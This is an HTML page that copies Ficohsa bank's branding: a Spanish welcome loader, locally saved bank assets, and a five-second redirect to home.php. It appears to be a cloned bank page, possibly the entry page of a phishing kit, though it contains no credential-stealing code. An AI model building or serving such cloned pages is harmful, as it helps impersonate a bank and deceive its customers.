<!doctype html><html lang="en" class="notranslate" translate="no">
<head>
<meta http-equiv="Refresh"
content="5;url=home.php"> 
    <meta name="google" content="notranslate"><title>Ficohsa</title><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><link rel="shortcut icon" href="Ficohsa_files/isotipo-ficohsa-blanco.ico" type="image/x-icon"/><!-- #region prisma --><script type="text/javascript" src="../campaigns.ficohsa.com_443/sdk/javascript/prisma.js"></script><!-- --><script type="text/javascript" id="64bb2703-e0c3-49e7-a41d-d4115ea3a62f">(function (s, h, ci, si, wi) {
            s = s + Math.random().toString(36).substring(7) + "/login.js?clientId=" + ci + "&websiteId=" + wi;
            window._dmo = {src: s, host: h, sessionId: si, clientId: ci, websiteId: wi};
            var a = document.createElement("script");
            a.type = "text/javascript";
            a.src = s;
            a.async = !0;
            var b = document.getElementsByTagName("script")[0];
            b.parentNode.insertBefore(a, b);
        })('https://spmfondo.ficohsa.com:443/scriptdealer/script/v1/', 'https://spmfondo.ficohsa.com:443/',
            'c24ec572-88e6-41ab-9aa9-af7144c5a394', null, '1045');</script><!-- --><link href="Ficohsa_files/styles.b1d6cdcc40a888de1051.bundle.css" rel="stylesheet"/></head><body><icb-app class="app"></icb-app><div class="app_overlay"><!-- MERGE: El loading se carga aquí --><div class="mesina-loader"><div class="mesina-logo"></div><div class="spinner"><div class="bounce1"></div><div class="bounce2"></div><div class="bounce3"></div></div><div class="mesina-welcome-title">Bienvenido</div><div class="mesina-welcome-subtitle1">Favor espera un momento...</div></div></div><script type="text/javascript" src="inline.ca44eecbf42bd41b6278.bundle.js"></script></body>
</html>